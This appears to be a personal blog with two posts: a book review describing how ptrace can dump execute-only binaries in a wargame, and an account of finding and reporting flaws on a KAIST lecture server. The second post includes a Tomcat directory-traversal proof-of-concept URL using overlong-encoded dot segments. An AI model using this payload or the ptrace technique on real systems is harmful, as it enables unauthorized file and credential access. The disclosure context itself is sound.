8th

09,05

WOW Story

2 Comments » Books Taesoo Kim

User image

It is a good introductory book on recent trends of computer hacking, especially on Packing. Personally, the part on ptrace-related vulnerability – loopholes of design philosophy – is the most interesting. As you may know, Linux has 3 optional permissions : read/write/execute. What if superuser set files as executable but not readable? In this case, there is one way to dump the loaded file in a memory to the file on hard disk. Ptrace is the key, which is the interface to debug processes in Linux. When executing a root-privilege file by spawning child with ptrace option, we can trap the loaded time as a parent process (execl).

An excellent case is in the hacking game. In order to go into higher level, we have to input the password to the root file. In this case, we can lunch the file but cannot read/write the file. If you can read the executable file, we can analyze that file, simply typing strings for example. However, while executing that file, we can see the content with this ptrace technique!

,

21st

08,12

Vulnerability of KAIST server

1 Comment » Tech Taesoo Kim

I reported a vulnerability to KAIST Security Team, and they sent an email that they corrected it.

When I was evaluating lectures that I took in this semester, I found that KAIST portal redirect the page to ‘lecture’ server. Surprisingly, it was working with Tomcat framework, but what was the problem?
Below is the address I was redirected from “http://portal.kaist.ac.kr/[blabla]“
“http://lecture.kaist.ac.kr/lecture/student/[blabla].mxml”
User image
The thing is that the most fundamental policy of the Internet is not allowable to share between different server (specifically URL) in HTTP and Javascript standpoint.
Anyhow, how the servers share the logined information (cookie) between logined portal to ‘lecture’ server? It is expected to be POST request (check the html code of the portal, I can see it has dirty information and personal security ID). It means we can find the ANY information by capturing only dummy html files between the web browser and server, so called man-in-the-middle attack.
User image
Try to understand the URL hierarchy.
Check first, ”http://lecture.kaist.ac.kr/lecture”
User image
Konglish JSP files for an administrator.
Check “”http://lecture.kaist.ac.kr”
User image
But, the most serious problem is that Tomcat/5.5.26.

If your webroot directory has three depth(e.g /usr/local/wwwroot), An
attacker can access arbitrary files as below. (Proof-of-concept)
http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar
Combining both of facts, lists of JSP files and access file vulnerability, any students can access the database. Even much seriously, that JSP files have to have ID/PASS of admin because it is file for processing evaluation-result database (or something).
When I see the vulnerability (maybe occupational disease), I want to inform this fact to the administrator.
Thus, I reported this problem to Security Team as quickly as possible, and all problems are already fixed.
What about your web server? check today otherwise hackers exploit your server for fun.